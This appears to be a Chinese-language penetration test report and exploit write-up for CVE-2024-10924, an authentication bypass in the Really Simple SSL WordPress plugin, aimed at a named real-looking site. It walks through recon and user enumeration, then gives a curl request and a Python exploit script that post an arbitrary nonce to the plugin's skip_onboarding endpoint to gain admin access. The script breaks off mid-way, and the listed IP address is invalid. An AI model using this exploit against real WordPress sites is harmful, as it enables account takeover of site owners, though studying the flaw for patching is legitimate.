# CVE-2024-10924 的渗透测试报告与利用程序——Really Simple SSL 中的 2FA 绕过,包含侦察、利用与修复指南。
目标: https://skior.co
漏洞: CVE-2024-10924 - Really Simple SSL 插件中的 2FA 绕过
严重性: 严重(CVSS 评分:9.8)
状态: 已成功利用
发现日期: 2025-06-25
报告版本: 2.1
本次渗透测试发现了一个关键的身份验证绕过漏洞,该漏洞允许未经身份验证的攻击者通过绕过双因素身份验证(2FA)控制来获取 WordPress 网站的管理员访问权限。
| 风险等级 | 可能性 | 影响 | 缓解优先级 |
|---|---|---|---|
| 严重 | 高 | 系统完全沦陷 | 立即 |
| 高 | 中 | 数据泄露 | 高 |
| 中 | 低 | 服务中断 | 中 |
| 字段 | 值 |
|---|---|
| 域名 | https://skior.co |
| IP 地址 | 123.456.789.200 |
| 服务器 | nginx/1.26.0 (Ubuntu) |
| PHP 版本 | 8.2.28 |
| CMS | WordPress 6.8.1 |
| 易受攻击的插件 | Really Simple SSL |
| 地理位置 | 美国 |
| 托管服务商 | 专业托管(可能是 VPS/专用服务器) |
本次评估遵循了基于行业标准的系统性黑盒渗透测试方法论:
| 日期/时间 | 事件 | 详细信息 |
|---|---|---|
| 2025-06-25 14:02 | 初步侦察 | Wappalyzer 分析完成 |
| 2025-06-25 14:05 | 识别技术栈 | WordPress 6.8.1、nginx、PHP 8.2.28 |
| 2025-06-25 14:10 | 用户枚举 | 发现用户 "pastor"(ID:1) |
| 2025-06-25 14:15 | WPScan 分析 | 未发现已知漏洞 |
| 2025-06-25 14:20 | REST API 枚举 | 发现 Really Simple SSL 端点 |
| 2025-06-25 14:25 | 漏洞研究 | 识别出 CVE-2024-10924 |
| 2025-06-25 14:30 | 手动测试 | 确认漏洞存在 |
| 2025-06-25 14:35 | 漏洞利用开发 | 创建 Python 概念验证 |
| 2025-06-25 14:40 | 成功利用 | 获取管理员访问权限 |
| 2025-06-25 14:45 | 影响评估 | 记录潜在损害 |
| 2025-06-25 15:00 | 报告生成 | 综合文档 |

已识别的技术:
└─$ whatweb https://skior.co
https://skior.co [200 OK] Country[UNITED STATES][US], HTML5,
HTTPServer[Ubuntu Linux][nginx/1.26.0 (Ubuntu)], IP[123.456.789.200],
JQuery[3.7.1],MetaGenerator[Elementor 3.29.2;
features: additional_custom_breakpoints, e_local_google_fonts;
settings: css_print_method-external, google_font-enabled, font_display-swap,
WordPress 6.8.1], PHP[8.2.28], PoweredBy[Skior],
Script[speculationrules,text/javascript], Title[Skior Technologies],
UncommonHeaders[link], WordPress[6.8.1], X-Powered-By[PHP/8.2.28], nginx[1.26.0]
**主要发现:**
- 使用最新版本的现代 WordPress 安装
- 使用 nginx 的专业托管设置
- 自定义品牌("PoweredBy[Skior]")
- 正在使用 Elementor 页面构建器
- 地理位置:美国
### 步骤 2:用户枚举
#### A. WordPress 作者枚举```bash
└─$ curl -I https://skior.co/?author=1
HTTP/1.1 301 Moved Permanently
Server: nginx/1.26.0 (Ubuntu)
Date: Wed, 25 Jun 2025 18:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.2.28
X-Redirect-By: WordPress
Location: https://skior.co/author/pastor/
发现的用户: pastor (用户 ID: 1)
for i in {1..10}; do echo "Checking user ID: $i" curl -s -o /dev/null -w "%{http_code}" "https://skior.co/?author=$i" echo " - https://skior.co/?author=$i" done
#### C. 用户名枚举结果
| 用户 ID | 用户名 | 状态 | 重定向 URL |
|---------|----------|--------|--------------|
| 1 | pastor | ✅ 已找到 | `/author/pastor/` |
| 2-10 | N/A | ❌ 未找到 | 404 响应 |
### 步骤 3:漏洞扫描
#### A. WPScan 全面分析```bash
└─$ wpscan --url https://skior.co --api-token my-api-key
扫描结果摘要:
注意: WPScan 未检测到 Really Simple SSL 插件,表明该插件可能使用了混淆或自定义命名。
└─$ curl -s https://skior.co/wp-json/ | jq '.routes | keys[]'
**发现的自定义端点:**```
/reallysimplessl/v1/two_fa
/reallysimplessl/v1/two_fa/skip_onboarding
/reallysimplessl/v1/two_fa/do_not_ask_again
/reallysimplessl/v1/two_fa/resend_email_code
/reallysimplessl/v1/two_fa/save_default_method_email
/reallysimplessl/v1/two_fa/save_default_method_email_profile
/reallysimplessl/v1/two_fa/save_default_method_totp
/reallysimplessl/v1/two_fa/validate_email_setup
关键发现: /reallysimplessl/v1/two_fa/skip_onboarding 端点看起来可疑,有必要进一步调查。
在发现自定义 REST API 路由后,外部研究揭示了 CVE-2024-10924,这是一个影响 Really Simple SSL 插件的严重漏洞。
CVE ID: CVE-2024-10924
CVSS 评分: 9.8(严重)
受影响插件: Really Simple SSL
漏洞类型: 身份验证绕过
攻击向量: REST API
发现日期: 2024 年 11 月 6 日
公开披露: 2024 年 11 月 14 日
该漏洞源于双因素身份验证 REST API 操作中 check_login_and_get_user 函数对用户验证不当。该函数未能正确验证 login_nonce 参数,从而允许攻击者:
// Simplified vulnerable code structure function check_login_and_get_user($user_id, $login_nonce) { // Missing proper validation of login_nonce $user = get_user_by('ID', $user_id);
// No validation of login_nonce parameter
// This allows any value to be accepted
return $user; // Returns user object without verification
}
#### 受影响的端点
以下 REST API 端点存在漏洞:
- `/reallysimplessl/v1/two_fa/skip_onboarding`
- `/reallysimplessl/v1/two_fa/do_not_ask_again`
- `/reallysimplessl/v1/two_fa/resend_email_code`
#### 漏洞条件
要使此漏洞可利用,需满足以下条件:
- ✅ 必须安装并激活 Really Simple SSL 插件
- ✅ 必须启用双因素认证设置(默认禁用)
- ✅ 系统上必须至少存在一个用户账户
- ✅ REST API 必须可访问(WordPress 默认设置)
---
## 🔄 攻击流程```mermaid
graph TD
A[Initial Reconnaissance] --> B[Technology Stack Identification]
B --> C[User Enumeration]
C --> D[Vulnerability Scanning]
D --> E[REST API Enumeration]
E --> F[Discovery of Really Simple SSL Endpoints]
F --> G[External Research]
G --> H[Identification of CVE-2024-10924]
H --> I[Manual Testing]
I --> J[Exploit Development]
J --> K[Successful Exploitation]
K --> L[Admin Access Obtained]
L --> M[Impact Assessment]
style A fill:#e1f5fe
style F fill:#fff3e0
style H fill:#ffebee
style K fill:#e8f5e8
style L fill:#f3e5f5
首先,我们手动测试了该端点以了解其行为:```bash
curl -X POST "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
-H "Content-Type: application/json"
-d '{
"user_id": 1,
"login_nonce": "invalid_nonce",
"redirect_to": "/wp-admin/"
}'
#### B. Python 漏洞利用脚本```python
import requests
import urllib.parse
import sys
if len(sys.argv) != 2:
print("Usage: python exploit.py <user_id>")
sys.exit(1)
user_id = sys.argv[1]
url = "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
data = {
"user_id": int(user_id), # User ID from the argument
"login_nonce": "invalid_nonce", # Arbitrary value
"redirect_to": "/wp-admin/" # Target redirection
}
# Sending the POST request
response = requests.post(url, json=data)